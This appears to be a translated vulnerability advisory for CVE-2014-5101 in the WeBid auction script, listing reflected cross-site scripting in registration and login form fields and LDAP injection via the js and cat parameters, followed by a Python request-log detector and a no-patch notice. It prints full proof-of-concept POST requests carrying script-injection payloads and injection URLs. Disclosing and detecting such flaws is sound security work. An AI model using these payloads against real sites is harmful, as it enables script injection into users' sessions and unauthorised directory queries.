WeBid Multiple Cross-Site Scripting and LDAP Injection Vulnerabilities

Published: 2014-07-10
Updated: 2014-08-01

Affected systems:
WeBid 1.x
Description:
BUGTRAQ ID: 68519
CVE(CAN) ID: CVE-2014-5101

WeBid is an open-source auction script package.

WeBid 1.1.1 and other versions contain multiple cross-site scripting and LDAP injection vulnerabilities; a remote attacker can perform LDAP injection through the js or cat parameter.

<* Source: Govind Singh *>

Test method:

Warning

The following programs (methods) may be offensive in nature and are provided solely for security research and teaching. Users bear all risk themselves!

1. http://www.example.com/WeBid/register.php

Reflected cross-site scripting in the following parameters:
"TPL_name"
"TPL_nick"
"TPL_email"
"TPL_year"
"TPL_address"
"TPL_city"
"TPL_prov"
"TPL_zip"
"TPL_phone"
"TPL_pp_email"
"TPL_authnet_id"
"TPL_authnet_pass"
"TPL_worldpay_id"
"TPL_toocheckout_id"
"TPL_moneybookers_email"

PoC:
The XSS payload can be submitted through any of these parameters:

Host=www.example.com
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://www.example.com/web-id/register.php
Cookie=WEBID_ONLINE=57e5a8970c4a9df8850c130e44e49160; PHPSESSID=2g18aupihsotkmka8778utvk47
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=417
POSTDATA=csrftoken=&TPL_name="><script>alert('Hacked By Govind Singh aka NullPort');</script>&TPL_nick=&TPL_password=&TPL_repeat_password=&TPL_email=&TPL_day=&TPL_month=00&TPL_year=&TPL_address=&TPL_city=&TPL_prov=&TPL_country=United+Kingdom&TPL_zip=&TPL_phone=&TPL_timezone=0&TPL_nletter=1&TPL_pp_email=&TPL_authnet_id=&TPL_authnet_pass=&TPL_worldpay_id=&TPL_toocheckout_id=&TPL_moneybookers_email=&captcha_code=&action=first
----------------------------------------------------------------------------------------------------------------
2. http://www.example.com/WeBid/user_login.php

Reflected cross-site scripting in the following parameter:
"username"

Host=www.example.com
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://www.example.com/web-id/user_login.php
Cookie=WEBID_ONLINE=e54c2acd05a02315f39ddb4d3a112c1e; PHPSESSID=2g18aupihsotkmka8778utvk47
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=96
POSTDATA=username="><script>alert('xss PoC By Govind Singh');</script>&password=&input=Login&action=login
==================================================================================================================
3. LDAP Injection

PoC:
http://www.example.com/WeBid/loader.php?js=[LDAP]
http://www.example.com/WeBid/loader.php?js=js/jquery.js;js/jquery.lightbox.js;

PoC:
http://www.example.com/WeBid/viewhelp.php?cat=[LDAP]
Replace the cat= value with 1, 2, 3 or 4.
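As an added defender-side check (not part of the advisory and not WeBid's own code), the Python below flags requests that carry the parameters named above with XSS markers, or, for loader.php?js= and viewhelp.php?cat=, a value outside the benign shape the PoC URLs show. The allow-list regexes, the XSS heuristic and the sample requests are assumptions of this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Parameters the advisory names per WeBid script, keyed by basename (TPL_worldpay_id as in the PoC body).
WATCHED = {
    "register.php": {"TPL_name", "TPL_nick", "TPL_email", "TPL_year", "TPL_address",
                     "TPL_city", "TPL_prov", "TPL_zip", "TPL_phone", "TPL_pp_email",
                     "TPL_authnet_id", "TPL_authnet_pass", "TPL_worldpay_id",
                     "TPL_toocheckout_id", "TPL_moneybookers_email"},
    "user_login.php": {"username"},
    "loader.php": {"js"},
    "viewhelp.php": {"cat"},
}
# Assumed allow-list shapes for the LDAP-injection parameters, taken from the advisory's benign
# URLs: js= is a ';'-separated list of js/*.js paths, cat= is a small integer (1, 2, 3, 4).
ALLOW = {"loader.php": re.compile(r"^(js/[\w.-]+\.js;?)+$"),
         "viewhelp.php": re.compile(r"^\d{1,3}$")}
# Heuristic reflected-XSS markers: tag opener, event-handler attribute, javascript: URL,
# or a quote followed by '>' (the attribute break-out used in the advisory's PoC bodies).
XSS_RE = re.compile(r"<\s*/?\s*\w+|on\w+\s*=|javascript:|[\"']\s*>", re.I)

def check_request(method, url, body=""):
    """Return [(param, reason)] for one request; an empty list means nothing was flagged."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1]        # matches /WeBid/ and /web-id/ deployments alike
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST":                  # form fields arrive percent-encoded in the body
        for name, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(name, []).extend(values)
    allow, findings = ALLOW.get(script), []
    for name in sorted(WATCHED.get(script, ())):
        for value in filter(None, params.get(name, [])):
            if allow and not allow.match(value):
                findings.append((name, "ldap-injection-suspect"))
            elif not allow and XSS_RE.search(value):
                findings.append((name, "reflected-xss"))
    return findings

# Constructed sample traffic (not taken from the advisory) as (method, url, body) records.
SAMPLE_REQUESTS = [
    ("GET", "/WeBid/loader.php?js=js/jquery.js;js/jquery.lightbox.js;", ""),
    ("GET", "/WeBid/viewhelp.php?cat=*", ""),
    ("POST", "/WeBid/user_login.php", "username=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&password=&action=login"),
    ("POST", "/WeBid/register.php", "csrftoken=&TPL_name=Alice&TPL_city=Leeds&action=first"),
]

def scan(requests):
    """Map the url of every flagged request to its findings; clean requests are omitted."""
    return {url: f for method, url, body in requests if (f := check_request(method, url, body))}
```

Run against a WAF or reverse-proxy request log, the allow-list branch catches the LDAP cases without needing payload signatures, while the XSS branch is a heuristic and will also flag legitimate values containing '<' or '">'.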

Recommendation:
Vendor patch:

WeBid
-----
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's home page for the latest version:

http://www.webidsupport.com/forums/content.php?8-about

Reference: http://packetstormsecurity.com/files/127431/WeBid-1.1.1-Cross-Site-Scripting-LDAP-Injection.html

This security vulnerability was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.